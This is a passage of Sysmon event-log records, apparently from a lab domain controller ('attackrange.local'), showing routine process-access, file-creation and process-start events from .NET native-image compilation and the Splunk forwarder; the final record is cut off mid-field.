{"EventTime":"2020-08-01 08:03:39","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6503,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:39.711\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-21DB-5F25-0000-0010D7140A00}\r\nTargetProcessId: 172\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:39.711","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-21DB-5F25-0000-0010D7140A00}","TargetProcessId":"172","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6504,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:03:40.398\r\nProcessGuid: {41C8662E-21DB-5F25-0000-0010D7140A00}\r\nProcessId: 172\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\ac-0\\System.Configuration.dll\r\nCreationUtcTime: 2020-08-01 08:03:40.398","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:03:40.398","ProcessGuid":"{41C8662E-21DB-5F25-0000-0010D7140A00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\ac-0\\System.Configuration.dll","CreationUtcTime":"2020-08-01 08:03:40.398","EventReceivedTime":"2020-08-01 08:03:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6505,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:40.445\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-21DC-5F25-0000-0010B3180A00}\r\nTargetProcessId: 4788\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:40.445","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-21DC-5F25-0000-0010B3180A00}","TargetProcessId":"4788","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6506,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:40.445\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21DC-5F25-0000-0010B3180A00}\r\nTargetProcessId: 4788\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:40.445","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21DC-5F25-0000-0010B3180A00}","TargetProcessId":"4788","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:03:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6507,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:40.445\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-21DC-5F25-0000-0010B3180A00}\r\nTargetProcessId: 4788\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:40.445","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-21DC-5F25-0000-0010B3180A00}","TargetProcessId":"4788","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6508,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:40.507\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-21DC-5F25-0000-0010E21B0A00}\r\nTargetProcessId: 3492\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:40.507","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-21DC-5F25-0000-0010E21B0A00}","TargetProcessId":"3492","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6509,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:40.507\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21DC-5F25-0000-0010E21B0A00}\r\nTargetProcessId: 3492\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:40.507","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21DC-5F25-0000-0010E21B0A00}","TargetProcessId":"3492","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:03:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6510,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:40.507\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-21DC-5F25-0000-0010E21B0A00}\r\nTargetProcessId: 3492\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:40.507","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-21DC-5F25-0000-0010E21B0A00}","TargetProcessId":"3492","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6511,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:40.711\r\nProcessGuid: {41C8662E-21DC-5F25-0000-0010DB1E0A00}\r\nProcessId: 2152\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nFileVersion: 10.0.10011.16384\r\nDescription: SplunkMonNoHandle Control Program\r\nProduct: Windows (R) Win 7 DDK driver\r\nCompany: Windows (R) Win 7 DDK provider\r\nOriginalFileName: SplunkMonNoHandle.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 08:03:40.711","ProcessGuid":"{41C8662E-21DC-5F25-0000-0010DB1E0A00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","FileVersion":"10.0.10011.16384","Description":"SplunkMonNoHandle Control Program","Product":"Windows (R) Win 7 DDK driver","Company":"Windows (R) Win 7 DDK provider","OriginalFileName":"SplunkMonNoHandle.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT 